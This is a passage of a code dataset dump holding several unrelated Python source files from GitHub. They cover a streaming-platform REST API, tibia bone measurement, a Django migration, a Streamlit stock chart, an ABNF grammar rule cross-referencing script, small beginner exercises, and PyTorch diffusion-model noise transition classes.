results.append(entry)\n\n db.session.commit()\n return {\"results\": results}\n\n\n@api.route(\"/<int:streamID>\")\n@api.doc(params={\"streamID\": \"ID Number for the Stream\"})\nclass api_1_ListStream(Resource):\n def get(self, streamID):\n \"\"\"\n Returns Info on a Single Active Streams\n \"\"\"\n streamList = Stream.Stream.query.filter_by(active=True, id=streamID).all()\n db.session.commit()\n return {\"results\": [ob.serialize() for ob in streamList]}\n # Channel - Change Channel Name or Topic ID\n\n @api.expect(streamParserPut)\n @api.doc(security=\"apikey\")\n @api.doc(responses={200: \"Success\", 400: \"Request Error\"})\n def put(self, streamID):\n \"\"\"\n Change a Streams's Name or Topic\n \"\"\"\n if \"X-API-KEY\" in request.headers:\n requestAPIKey = apikey.apikey.query.filter_by(\n key=request.headers[\"X-API-KEY\"]\n ).first()\n if requestAPIKey is not None:\n if requestAPIKey.isValid():\n streamQuery = Stream.Stream.query.filter_by(\n active=True, id=int(streamID)\n ).first()\n if streamQuery is not None:\n channelQuery = cachedDbCalls.getChannel(\n streamQuery.linkedChannel\n )\n if channelQuery.owningUser == requestAPIKey.userID:\n args = streamParserPut.parse_args()\n if \"streamName\" in args:\n if args[\"streamName\"] is not None:\n streamQuery.streamName = args[\"streamName\"]\n if \"topicID\" in args:\n if args[\"topicID\"] is not None:\n possibleTopics = topics.topics.query.filter_by(\n id=int(args[\"topicID\"])\n ).first()\n if possibleTopics is not None:\n streamQuery.topic = int(args[\"topicID\"])\n db.session.commit()\n return {\"results\": {\"message\": \"Stream Updated\"}}, 200\n return {\"results\": {\"message\": \"Request Error\"}}, 400\n\n\n@api.route(\"/search\")\nclass api_1_SearchStreams(Resource):\n # Streams - Search Live Streams\n @api.expect(streamSearchPost)\n @api.doc(responses={200: \"Success\", 400: \"Request Error\"})\n def post(self):\n \"\"\"\n Searches Stream Names and Metadata and returns Name and Link\n \"\"\"\n sysSettings = cachedDbCalls.getSystemSettings()\n args = streamSearchPost.parse_args()\n returnArray = []\n if \"term\" in args:\n returnArray = cachedDbCalls.searchStreams(args[\"term\"])\n return {\"results\": returnArray, \"adaptive\": sysSettings.adaptiveStreaming}\n else:\n return {\"results\": {\"message\": \"Request Error\"}}, 400\n","repo_name":"Open-Streaming-Platform/open-streaming-platform","sub_path":"blueprints/apis/stream_ns.py","file_name":"stream_ns.py","file_ext":"py","file_size_in_byte":6312,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"48"} +{"seq_id":"44404700030","text":"# python libraries\nimport logging\nfrom shapely.geometry import Polygon\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\nfrom core_alg.base import Bone\nfrom core_alg.utilities import bone_region_util\n\ntml_coeff = 0.995\ntpb_coeff = 0.985\n\n\ndef get_tml(alpha_shape, show_figure, left_bone_points_ordered, right_bone_points_ordered):\n (min_x, min_y, max_x, max_y) = alpha_shape.exterior.bounds\n x_length = max_x - min_x\n y_length = max_y - min_y\n\n # left-upper box\n left_upper_box = Polygon([(min_x, min_y + y_length * 0.75), (min_x, max_y), (min_x + x_length / 10, max_y), (min_x + x_length / 10, min_y + y_length * 0.75)])\n left_upper_bone = alpha_shape.intersection(left_upper_box)\n (min_x_left_upper, _, _, _) = left_upper_bone.exterior.bounds\n\n # left-lower box\n left_lower_box = Polygon([(min_x, min_y), (min_x, min_y + y_length * 0.25), (min_x + x_length / 10, min_y + y_length * 0.25),\n (min_x + x_length / 10, min_y)])\n left_lower_bone = alpha_shape.intersection(left_lower_box)\n (min_x_left_lower, _, _, _) = left_lower_bone.exterior.bounds\n\n poi_x = min(min_x_left_upper, min_x_left_lower)\n tml = max_x - poi_x\n\n if show_figure:\n # most left point, 1st POIs\n p_left = []\n for i in range(len(left_bone_points_ordered)):\n if left_bone_points_ordered[i][0] == poi_x:\n p_left = left_bone_points_ordered[i]\n break\n\n # most right point, 2nd POIs\n p_right = []\n right_most_idx = 0\n for i in range(len(right_bone_points_ordered)):\n if right_bone_points_ordered[i][0] == max_x:\n p_right = right_bone_points_ordered[i]\n break\n\n fig, ax = plt.subplots()\n x, y = alpha_shape.exterior.xy\n ax.plot(x, y)\n ax.plot(p_left[0], p_left[1], 'r+')\n ax.plot(p_right[0], p_right[1], 'r+')\n\n p_rec_left_bottom = [min_x - 20, min_y + y_length * 0.25]\n rect = patches.Rectangle((p_rec_left_bottom[0], p_rec_left_bottom[1]), 40, y_length * 0.5, linestyle='dashed',\n linewidth=0.5, edgecolor='b', facecolor='none')\n ax.add_patch(rect)\n ax.set_aspect('equal')\n plt.show()\n\n tml /= tml_coeff\n return tml\n\n\ndef get_tpb(alpha_shape, show_figure, left_bone, left_bone_points_ordered):\n (min_x, min_y, max_x, max_y) = alpha_shape.exterior.bounds\n tpb = max_y - min_y\n\n if show_figure:\n (left_bone_min_x, left_bone_min_y, left_bone_max_x,\n left_bone_max_y) = left_bone.exterior.bounds\n # top point, 1st POIs\n p_top = []\n for i in range(len(left_bone_points_ordered)):\n if left_bone_points_ordered[i][1] == left_bone_max_y:\n p_top = left_bone_points_ordered[i]\n break\n\n # bottom point, 1st POIs\n p_bottom = []\n for i in range(len(left_bone_points_ordered)):\n if left_bone_points_ordered[i][1] == left_bone_min_y:\n p_bottom = left_bone_points_ordered[i]\n break\n\n fig, ax = plt.subplots()\n x, y = alpha_shape.exterior.xy\n ax.plot(x, y)\n ax.plot(p_top[0], p_top[1], 'r+')\n ax.plot(p_bottom[0], p_bottom[1], 'r+')\n ax.set_aspect('equal')\n plt.show()\n\n tpb /= tpb_coeff\n return tpb\n\n\ndef get_measurement(tibia, show_figure):\n logging.info('Start measuring tibia')\n left_region, left_region_points_ordered = bone_region_util.get_left_region(\n tibia.alpha_shape)\n _, right_region_points_ordered = bone_region_util.get_right_region(\n tibia.alpha_shape)\n tibia.tml = get_tml(tibia.alpha_shape, show_figure, left_region_points_ordered, right_region_points_ordered)\n tibia.tpb = get_tpb(tibia.alpha_shape, show_figure, left_region, left_region_points_ordered)\n","repo_name":"zilipp/CSE260BoneProjectMaterial","sub_path":"web/core_alg/scan/measure_tibia.py","file_name":"measure_tibia.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26576956454","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('features', '0003_instrument'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=80)),\n ('object_type', models.CharField(blank=True, max_length=31, null=True, verbose_name=b'ObjectType', choices=[(b'PORTFOLIO', b'PORTFOLIO'), (b'USER', b'USER'), (b'INSTRUMENT', b'INSTRUMENT')])),\n ],\n ),\n migrations.AlterField(\n model_name='instrument',\n name='object_type',\n field=models.CharField(blank=True, max_length=31, null=True, verbose_name=b'ObjectType', choices=[(b'PORTFOLIO', b'PORTFOLIO'), (b'USER', b'USER'), (b'INSTRUMENT', b'INSTRUMENT')]),\n ),\n migrations.AlterField(\n model_name='portfolio',\n name='object_type',\n field=models.CharField(blank=True, max_length=31, null=True, verbose_name=b'ObjectType', choices=[(b'PORTFOLIO', b'PORTFOLIO'), (b'USER', b'USER'), (b'INSTRUMENT', b'INSTRUMENT')]),\n ),\n ]\n","repo_name":"rajpaul/test_quiz","sub_path":"features/migrations/0004_auto_20150818_1002.py","file_name":"0004_auto_20150818_1002.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1747591876","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 27 08:52:22 2021\r\n\r\n@author: carol\r\n\"\"\"\r\n\r\nimport yfinance as yf\r\nimport streamlit as st\r\nimport pandas as pd\r\n\r\nst.write(\"\"\"\r\n# Simple stock Price App\r\n\r\n\r\nShown something\r\n\r\n\"\"\")\r\n\r\ntickerSimbol ='GOOGL'\r\n\r\ntickerData = yf.Ticker(tickerSimbol)\r\ntickerDf = tickerData.history(period='1d', start='2010-5-31', end='2021-1-26')\r\n\r\nst.line_chart(tickerDf.Close)\r\nst.line_chart(tickerDf.Volume)","repo_name":"LarryPrato/stockChart","sub_path":"stockChart.py","file_name":"stockChart.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1785270771","text":"import os\nimport csv\nfrom data_utils import read_rulelist, write_list_txt\nimport abnf\nimport re\nimport glob\nfrom tqdm import tqdm\nfrom abnf.grammars import rfc5234\n\n\ndef check_names_definition_simple(rulelist): \n #\n # parse每一个rule,\n # 把所有等号左边的记录下来,\n # 检查每个等号右边的name,如果符合rulename的定义,则\n \n import abnf\n valid_name = set()\n invalid_name = set()\n # abnf_rules = [\n # \"ALPHA\", \"BIT\", \"CHAR\", \"CR\", \"CRLF\", \"CTL\", \"DIGIT\", \"DQUOTE\", \"HEXDIG\",\n # \"HTAB\", \"LF\", \"OCTET\", \"SP\", \"VCHAR\", \"WSP\", \"element\", \"ALTERNATIVE\",\n # \"CONCATENATION\", \"OPTIONAL\", \"REPEAT\"\n # ]\n\n\n left_part = []\n right_part = []\n for rule in rulelist:\n parts = rule.split(\"=\")\n left_part.append(parts[0].strip())\n right_part.append(parts[1].strip())\n valid_name.add(parts[0].strip())\n \n for right in right_part:\n if \";\" in right:\n right = right.split(\";\")[0]\n for name in right.split():\n try:\n node = abnf.parser.ABNFGrammarRule(\"rulename\").parse_all(name)\n if name not in valid_name:\n invalid_name.add(name)\n except:\n pass\n\n\n\n\n return valid_name, invalid_name\n\n\ndef get_undefined_names(rulelist,rule_dict): \n data = [] # (rule,\"name1, name2, ...\")\n \n valid_name = set()\n for rule in rulelist:\n parts = rule.split(\"=\")\n valid_name.add(parts[0].strip())\n\n undefined_all = []\n for rule in rulelist:\n parts = rule.split(\"=\")\n right = parts[1].strip()\n\n if \";\" in right:\n right = right.split(\";\")[0]\n \n undefined_names = []\n for name in right.split():\n try:\n node = abnf.parser.ABNFGrammarRule(\"rulename\").parse_all(name)\n if name not in valid_name and name not in rule_dict :\n undefined_names.append(name)\n undefined_all.append(name)\n except:\n pass\n if undefined_names:\n data.append((rule,\" \".join(undefined_names),len(undefined_names)))\n return data, undefined_all\n\n \n\n\n\ndef get_def_dict(folder_path):\n result_dict = {}\n for filename in os.listdir(folder_path):\n if filename.endswith('.txt') and filename.startswith('rfc'):\n rfc_num = filename[3:-4]\n with open(os.path.join(folder_path, filename), 'r') as f:\n file_str = f.read()\n rules = file_str.split('\\n\\n')\n for rule in rules:\n rule = rule.strip()\n if '=' in rule:\n rule_name = rule.split('=')[0].strip()\n result_dict[rule_name] = {\n 'rule':rule,\n 'src':rfc_num\n }\n return result_dict\n\n\ndef remove_duplicate(rulelist):\n # 初始化一个字典来保存rule和它出现的次数\n rule_dict = {}\n # 初始化一个列表来保存被删除的rule\n deleted_rules = []\n \n # 遍历规则列表\n for rule in rulelist:\n # 提取每一个规则名称,即等号左边的部分\n rule_name = rule.split('=')[0].strip()\n \n # 如果这个规则名称在字典中还没有出现过,就将它和对应的rule添加到字典中\n if rule_name not in rule_dict:\n rule_dict[rule_name] = rule\n # 否则,将这个rule添加到删除的列表中\n else:\n deleted_rules.append(rule)\n \n # 将字典转换为列表并返回\n return list(rule_dict.values()), deleted_rules\n\n\n\ndef delete_non_abnf_old(rulelist):\n # Step 1: Record all rulenames in a set.\n predefined_rulenames = {\"_CONSTANT\", \"OCTET\", \"BIT\", \"HEXDIG\", \"CTL\", \"HTAB\", \"LWSP\", \"CR\", \"VCHAR\", \"DIGIT\", 'WSP', 'DQUOTE', 'LF', 'SP', 'CRLF', 'CHAR', 'ALPHA',}\n defined_names = set(rule.split(\"=\")[0].strip() for rule in rulelist) | predefined_rulenames\n \n # List to keep valid rules\n valid_rules = []\n # List to keep removed rules\n removed_rules = []\n\n # Step 2: Check each rule.\n for rule in rulelist:\n # Replace all quoted strings with _CONSTANT\n temp_rule = re.sub(r'\"[^\"]*\"', \"_CONSTANT\", rule)\n\n # Remove the part after the semicolon.\n rule_no_comment = temp_rule.split(\";\", 1)[0]\n\n # Get the part between the first equals sign.\n parts = rule_no_comment.split(\"=\", 1)\n part = parts[1].strip()\n\n # Extract rulenames\n # This regex looks for word characters that aren't inside double quotes.\n rulenames = re.findall(r'(?:(?<=\\s)|(?<=^))(?:(?![\\w-]*\")[\\w-]+)', part)\n\n # If any of the rulenames doesn't exist in defined_names, remove the rule.\n # But if the part contains \"/\" or \"*\", or any rulename contains \"-\", or \"_CONSTANT\" in part, keep the rule.\n is_undefined_rulename = all(rulename not in defined_names for rulename in rulenames)\n contains_slash_or_star = \"/\" in part or \"*\" in part\n contains_hyphen = any('-' in rulename for rulename in rulenames)\n contains_constant = \"_CONSTANT\" in part\n \n if is_undefined_rulename and not contains_slash_or_star and not contains_hyphen and not contains_constant:\n removed_rules.append(rule)\n else:\n valid_rules.append(rule)\n return valid_rules, removed_rules\n\n\ndef get_rulename_from_node(node):\n \"\"\"Do a breadth-first search of the tree for addr-spec node. If found, \n return its value.\"\"\"\n rulenames = []\n queue = [node]\n while queue:\n n, queue = queue[0], queue[1:]\n if n.name == 'rulename':\n rulenames.append(n.value)\n \n queue.extend(n.children)\n return rulenames\n\ndef get_dependence_rulename(rule): # 找到一条rule里等号右侧的所有rulename\n\n\n parser = abnf.grammars.rfc5234.Rule('rule')\n node = parser.parse_all(rule)\n name_list = get_rulename_from_node(node)\n return name_list\n\n\ndef get_group(node):\n \"\"\"Do a breadth-first search of the tree for addr-spec node. If found, \n return its value.\"\"\"\n rulenames = []\n queue = [node]\n while queue:\n n, queue = queue[0], queue[1:]\n if n.name == 'group':\n rulenames.append(n.value)\n \n queue.extend(n.children)\n return rulenames\n\ndef get_group_names(rule):\n import re\n\n def extract_words_from_parentheses(text):\n # 使用正则表达式提取括号内的内容\n matches = re.findall(r'\\((.*?)\\)', text)\n if matches:\n words = matches[0].split() # 分割单词\n return words # 在每个单词两侧添加双引号并返回列表\n return []\n \n parser = abnf.grammars.rfc5234.Rule('rule')\n node = parser.parse_all(rule)\n group = get_group(node)\n if group:\n group_names = extract_words_from_parentheses(group[0])\n return group_names\n else:\n return []\n\n\ndef delete_non_abnf(rulelist):\n import abnf\n\n name_list_list = []\n defined_names = {\"OCTET\", \"BIT\", \"HEXDIG\", \"CTL\", \"HTAB\", \"LWSP\", \"CR\", \"VCHAR\", \"DIGIT\", 'WSP', 'DQUOTE', 'LF', 'SP', 'CRLF', 'CHAR', 'ALPHA',}\n \n # List to keep valid rules\n valid_rules = []\n # List to keep removed rules\n removed_rules = []\n \n for rule in rulelist:\n rule += \"\\n\"\n rule = rule.replace(\"\\n\",\"\\r\\n\")\n\n name_list = get_dependence_rulename(rule)\n defined_names.add(name_list[0])\n name_list_list.append(name_list[1:])\n \n for i, rule in enumerate(rulelist):\n rulenames = name_list_list[i]\n\n is_undefined_rulename = False\n if rulenames: # 如果右边有rulenmaes,且都未定义\n is_undefined_rulename = all(rulename not in defined_names for rulename in rulenames)\n \n contains_slash_or_star = \"/\" in rule or \"*\" in rule\n contains_hyphen = any('-' in rulename for rulename in rulenames)\n contains_constant = '\"' in rule\n\n if is_undefined_rulename and not contains_slash_or_star and not contains_hyphen and not contains_constant:\n removed_rules.append(rule)\n else:\n valid_rules.append(rule)\n return valid_rules, removed_rules\n\n\n \n\n\n\n\nif __name__ ==\"__main__\":\n # 找到rulelist中没有定义的name,在字典中查找他们,如果在字典中,则将对应的rule添加到该list中\n input_folder = 'abnf/parse_out'\n output_folder = 'abnf/cross_def'\n\n data = []\n\n undefined_names = []\n undefined_nums = []\n rule_dict = get_def_dict(\"abnf/parse_out\") # rulename:{'rule':'aaa = bbb','src':i}\n non_abnf_data = []\n\n\n os.makedirs(\"abnf/cross_def\", exist_ok=True)\n\n txt_files = glob.glob(input_folder + \"/*.txt\")\n\n for file_path in tqdm(txt_files):\n match = re.search(r'rfc(\\d+)\\.txt', file_path)\n i = int(match.group(1)) if match else None\n out_path = f'{output_folder}/rfc{i}.txt'\n\n rulelist = read_rulelist(file_path)\n rulelist, removed = remove_duplicate(rulelist) # remove duplicate rules\n rulelist, non_abnf = delete_non_abnf(rulelist) \n \n # get undefined names\n valid_names, invalid_names = check_names_definition_simple(rulelist) \n \n # search undefined names in other rfc doc\n added_rules = []\n for name in invalid_names:\n if name in rule_dict:\n rule = rule_dict[name]['rule']\n added_rules.append(rule)\n # 记录csv \n data.append((i,rule,rule_dict[name]['src']))\n\n \n # keep record of deleted rules\n for rule in non_abnf:\n non_abnf_data.append((i,rule))\n\n rulelist.extend(added_rules)\n write_list_txt(rulelist,out_path)\n\n\n names_and_rules, undefined_all = get_undefined_names(rulelist,rule_dict)\n\n\n for t in names_and_rules:\n undefined_names.append((i,t[0],t[1],t[2]))\n\n undefined_nums.append((i,undefined_all,len(undefined_all)))\n\n\n\n with open('csv_files/non_abnf.csv', mode='w', newline='') as file:\n fieldnames = ['rfc_num', 'rule']\n writer = csv.writer(file)\n writer.writerow(fieldnames)\n for row in non_abnf_data:\n writer.writerow(row) \n \n with open('csv_files/add_cross_def.csv', mode='w', newline='') as file:\n fieldnames = ['rfc_num', 'added_rule',\"src\"]\n writer = csv.writer(file)\n writer.writerow(fieldnames)\n for row in data:\n writer.writerow(row) \n \n \n with open('csv_files/undef_name_and_rule.csv', mode='w', newline='') as file:\n fieldnames = ['rfc_num', 'rule',\"undef_name\",\"num\"]\n writer = csv.writer(file)\n writer.writerow(fieldnames)\n for row in undefined_names:\n writer.writerow(row) \n \n with open('csv_files/undefined_all.csv', mode='w', newline='') as file:\n fieldnames = ['rfc_num', 'undefined_names',\"num\"]\n writer = csv.writer(file)\n writer.writerow(fieldnames)\n for row in undefined_nums:\n writer.writerow(row) \n\n \n\n\n\n","repo_name":"zy8848/abnf-extractor","sub_path":"cross_def.py","file_name":"cross_def.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"741432347","text":"class Vehicle:\r\n def __init__(self):\r\n self.vehicle_type = \"\"\r\n\r\n def set_vehicle_type(self, vehicle_type):\r\n self.vehicle_type = vehicle_type\r\n\r\n\r\nclass Automobile(Vehicle):\r\n def __init__(self):\r\n super().__init__()\r\n self.year = \"\"\r\n self.make = \"\"\r\n self.model = \"\"\r\n self.doors = \"\"\r\n self.roof = \"\"\r\n\r\n def set_car_details(self, year, make, model, doors, roof):\r\n self.year = year\r\n self.make = make\r\n self.model = model\r\n self.doors = doors\r\n self.roof = roof\r\n\r\n def display_car_details(self):\r\n print(\"Vehicle type:\", self.vehicle_type)\r\n print(\"Year:\", self.year)\r\n print(\"Make:\", self.make)\r\n print(\"Model:\", self.model)\r\n print(\"Number of doors:\", self.doors)\r\n print(\"Type of roof:\", self.roof)\r\n\r\n\r\ndef main():\r\n automobile = Automobile()\r\n vehicle_type = \"car\" \r\n\r\n automobile.set_vehicle_type(vehicle_type)\r\n year = input(\"Enter the year: \")\r\n make = input(\"Enter the make: \")\r\n model = input(\"Enter the model: \")\r\n doors = input(\"Enter the number of doors (2 or 4): \")\r\n roof = input(\"Enter the type of roof (solid or sun roof): \")\r\n\r\n automobile.set_car_details(year, make, model, doors, roof)\r\n print(\"\\nCar Details:\")\r\n automobile.display_car_details()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"dbautista2/m03-case-study","sub_path":"m03 case study.py","file_name":"m03 case study.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11341794447","text":"#Given a list of numbers, output \"bingo\" if it contains the input number.\r\n\r\nx = [42, 8, 7, 1, 0, 124, 8897, 555, 3, 67, 99]\r\n\r\ndef bingo(num):\r\n if num in x:\r\n print(\"bingo\")\r\n else:\r\n print(\"try again later\")\r\n\r\nprint(\"Pick a number between 0 and 9000\")\r\nnum = int(input())\r\nbingo(num)\r\n","repo_name":"Aldrnarie/Training-Exercises","sub_path":"SoloLearn/Python For Beginners/Bingo.py","file_name":"Bingo.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8179268962","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..modules.layers import clampped_one_hot\nfrom ..utils.so3 import ApproxAngularDistribution, random_normal_so3, so3vec_to_rotation, rotation_to_so3vec\nfrom ..utils.misc import *\nfrom datasets.molecule.constants import num_fg_types\nfrom datasets.protein.constants import num_aa_types\n\nnum_total_type = num_fg_types + num_aa_types\n\nclass VarianceSchedule(nn.Module):\n\n def __init__(self, num_steps=100, s=0.01):\n super().__init__()\n T = num_steps\n t = torch.arange(0, num_steps+1, dtype=torch.float)\n f_t = torch.cos( (np.pi / 2) * ((t/T) + s) / (1 + s) ) ** 2\n alpha_bars = f_t / f_t[0]\n\n betas = 1 - (alpha_bars[1:] / alpha_bars[:-1])\n betas = torch.cat([torch.zeros([1]), betas], dim=0)\n betas = betas.clamp_max(0.999)\n\n sigmas = torch.zeros_like(betas)\n for i in range(1, betas.size(0)):\n sigmas[i] = ((1 - alpha_bars[i-1]) / (1 - alpha_bars[i])) * betas[i]\n sigmas = torch.sqrt(sigmas)\n\n self.register_buffer('betas', betas)\n self.register_buffer('alpha_bars', alpha_bars)\n self.register_buffer('alphas', 1 - betas)\n self.register_buffer('sigmas', sigmas)\n\nclass TypeMasker(nn.Module):\n def __init__(\n self, \n num_steps=100, \n mask_id=num_total_type, \n unmasked_steps=0, \n noise_schedule='uniform'\n ) -> None:\n super().__init__()\n self.noise_shedule = noise_schedule\n self.num_steps = num_steps\n self.unmasked_steps = unmasked_steps\n self.mask_id = mask_id\n self.register_buffer('_dummy', torch.empty([0, ]))\n\n\n def forward(self, x_0, t, node_mask=1, eps=None):\n\n node_mask = node_mask.bool()\n x_t, x_0_ignore = x_0.clone(), x_0.clone()\n\n if eps is not None:\n mask_prob = eps \n else:\n mask_prob = (\n (t.view(-1).float()-self.unmasked_steps).clamp(min=0.)\n / (self.num_steps-self.unmasked_steps)\n ).to(self._dummy.device)\n\n diff_mask = (\n torch.rand_like(x_t.float()) < inflate_batch_array(mask_prob, x_t.float())\n )\n\n # if true, the element will be masked\n diff_mask = torch.logical_and(diff_mask, node_mask)\n x_t[diff_mask] = self.mask_id\n x_0_ignore[torch.bitwise_not(diff_mask)] = -1\n return x_t, x_0_ignore, diff_mask, mask_prob\n \n def reveil_mask(self, x_disc, t):\n prob = (\n (t-self.num_steps) / (self.unmasked_steps-self.num_steps)\n ).clamp(max=1., min=0.)\n changes = (\n torch.rand_like(x_disc.float()) \n < inflate_batch_array(prob, x_disc)\n )\n return changes\n\n\n\nclass PositionTransition(nn.Module):\n\n def __init__(self, num_steps, var_sched_opt={}):\n super().__init__()\n self.var_sched = VarianceSchedule(num_steps, **var_sched_opt)\n\n def add_noise(self, p_0, mask_generate, t):\n \"\"\"\n Args:\n p_0: (N, L, 3).\n mask_generate: (N, L).\n t: (N,).\n \"\"\"\n alpha_bar = self.var_sched.alpha_bars[t]\n\n c0 = torch.sqrt(alpha_bar).view(-1, 1, 1)\n c1 = torch.sqrt(1 - alpha_bar).view(-1, 1, 1)\n\n e_rand = torch.randn_like(p_0)\n p_noisy = c0*p_0 + c1*e_rand\n p_noisy = torch.where(mask_generate[..., None].expand_as(p_0), p_noisy, p_0)\n\n return p_noisy, e_rand, mask_generate\n\n def denoise(self, p_t, eps_p, mask_generate, t):\n # IMPORTANT:\n # clampping alpha is to fix the instability issue at the first step (t=T)\n # it seems like a problem with the ``improved ddpm''.\n alpha = self.var_sched.alphas[t].clamp_min(\n self.var_sched.alphas[-2]\n )\n alpha_bar = self.var_sched.alpha_bars[t]\n sigma = self.var_sched.sigmas[t].view(-1, 1, 1)\n\n c0 = ( 1.0 / torch.sqrt(alpha + 1e-8) ).view(-1, 1, 1)\n c1 = ( (1 - alpha) / torch.sqrt(1 - alpha_bar + 1e-8) ).view(-1, 1, 1)\n\n z = torch.where(\n (t > 1)[:, None, None].expand_as(p_t),\n torch.randn_like(p_t),\n torch.zeros_like(p_t),\n )\n\n p_next = c0 * (p_t - c1 * eps_p) + sigma * z\n p_next = torch.where(mask_generate[..., None].expand_as(p_t), p_next, p_t)\n return p_next\n\n\nclass RotationTransition(nn.Module):\n\n def __init__(self, num_steps, var_sched_opt={}, angular_distrib_fwd_opt={}, angular_distrib_inv_opt={}):\n super().__init__()\n self.var_sched = VarianceSchedule(num_steps, **var_sched_opt)\n\n # Forward (perturb)\n c1 = torch.sqrt(1 - self.var_sched.alpha_bars) # (T,).\n self.angular_distrib_fwd = ApproxAngularDistribution(c1.tolist(), **angular_distrib_fwd_opt)\n\n # Inverse (generate)\n sigma = self.var_sched.sigmas\n self.angular_distrib_inv = ApproxAngularDistribution(sigma.tolist(), **angular_distrib_inv_opt)\n\n self.register_buffer('_dummy', torch.empty([0, ]))\n\n def add_noise(self, v_0, mask_generate, t, consider_single=True):\n \"\"\"\n Args:\n v_0: (N, L, 3).\n mask_generate: (N, L).\n t: (N,).\n \"\"\"\n if consider_single:\n mask_single = torch.logical_not(torch.sum(v_0, dim=-1).abs() < 1e-6)\n else:\n mask_single = True\n\n mask_generate = mask_single * mask_generate\n N, L = mask_generate.size()\n alpha_bar = self.var_sched.alpha_bars[t]\n c0 = torch.sqrt(alpha_bar).view(-1, 1, 1)\n c1 = torch.sqrt(1 - alpha_bar).view(-1, 1, 1)\n\n # Noise rotation\n e_scaled = random_normal_so3(t[:, None].expand(N, L), self.angular_distrib_fwd, device=self._dummy.device) # (N, L, 3)\n e_normal = e_scaled / (c1 + 1e-8)\n E_scaled = so3vec_to_rotation(e_scaled) # (N, L, 3, 3)\n\n # Scaled true rotation\n R0_scaled = so3vec_to_rotation(c0 * v_0) # (N, L, 3, 3)\n\n R_noisy = E_scaled @ R0_scaled\n v_noisy = rotation_to_so3vec(R_noisy)\n v_noisy = torch.where(mask_generate[..., None].expand_as(v_0), v_noisy, v_0)\n\n return v_noisy, e_scaled, mask_generate\n\n def denoise(self, v_t, v_next, mask_generate, t):\n N, L = mask_generate.size()\n e = random_normal_so3(t[:, None].expand(N, L), self.angular_distrib_inv, device=self._dummy.device) # (N, L, 3)\n e = torch.where(\n (t > 1)[:, None, None].expand(N, L, 3),\n e, \n torch.zeros_like(e) # Simply denoise and don't add noise at the last step\n )\n E = so3vec_to_rotation(e)\n\n R_next = E @ so3vec_to_rotation(v_next)\n v_next = rotation_to_so3vec(R_next)\n v_next = torch.where(mask_generate[..., None].expand_as(v_next), v_next, v_t)\n\n return v_next\n\nclass PLTypeTransition(nn.Module):\n \n def __init__(\n self, \n num_steps, \n min_type_num, \n max_type_num, \n num_classes,\n var_sched_opt={'noise_schedule': 'uniform'}):\n super().__init__()\n self.num_classes = num_classes\n self.masker = TypeMasker(\n num_steps, \n mask_id=self.num_classes, \n unmasked_steps=num_steps//2,\n **var_sched_opt\n )\n\n self.min_type_num = min_type_num\n self.max_type_num = max_type_num\n self.register_buffer('_dummy', torch.empty([0, ]))\n\n\n def sample(self, c):\n \"\"\"\n Args:\n c: (N, L, K).\n Returns:\n x: (N, L).\n \"\"\"\n N, L, K = c.size()\n c = self.logits2prob(c)\n c = c.view(N*L, K) + 1e-8\n x = torch.multinomial(c, 1).view(N, L)\n return x\n\n\n def add_noise(self, x_0, mask_generate, t, eps=None):\n \"\"\"\n Args:\n x_0: (N, L)\n mask_generate: (N, L).\n t: (N,).\n Returns:\n x_0_ignore: Truth with mask, LongTensor, (N, L).\n x_t: Sample, LongTensor, (N, L).\n type_mask: Mask for calculate the loss, (N, L).\n \"\"\"\n\n x_t, x_0_ignore, type_mask, __ = self.masker(x_0, t, mask_generate, eps)\n\n return x_0_ignore, x_t, type_mask\n\n \n def before_softmax(self, x):\n assert x.dim() == 3\n N, L, M = x.size()\n\n mask_type = torch.zeros_like(x).bool()\n mask_type[:,:,:self.min_type_num] = True\n mask_type[:,:,self.max_type_num:] = True\n\n logits_pred = torch.where(mask_type, x-1e8, x)\n\n return logits_pred\n\n\n def logits2prob(self, x):\n logits_pred = self.before_softmax(x)\n x_pred = F.softmax(logits_pred, dim=-1)\n return x_pred\n\n\n def denoise(self, x_t, c_0_pred, mask_generate, t, temp=1.0):\n \"\"\"\n Args:\n x_t: (N, L).\n c_0_pred: Normalized probability predicted by networks, (N, L, K).\n mask_generate: (N, L).\n t: (N,).\n Returns:\n post: Posterior probability at (t-1)-th step, (N, L, K).\n x_next: Sample at (t-1)-th step, LongTensor, (N, L).\n \"\"\"\n\n changes = self.masker.reveil_mask(x_disc=x_t, t=t-1)\n unmasked = torch.logical_or((x_t!=self.masker.mask_id), (~mask_generate).bool())\n changes = torch.bitwise_xor(changes, torch.bitwise_and(changes, unmasked))\n\n x_logits = c_0_pred / temp\n x_next = self.sample(x_logits)\n\n x_t[changes] = x_next[changes]\n\n return x_t\n\n\nclass AminoacidCategoricalTransition(nn.Module):\n \n def __init__(self, num_steps, num_classes=20, var_sched_opt={}):\n super().__init__()\n self.num_classes = num_classes\n self.var_sched = VarianceSchedule(num_steps, **var_sched_opt)\n\n @staticmethod\n def _sample(c):\n \"\"\"\n Args:\n c: (N, L, K).\n Returns:\n x: (N, L).\n \"\"\"\n N, L, K = c.size()\n c = c.view(N*L, K) + 1e-8\n x = 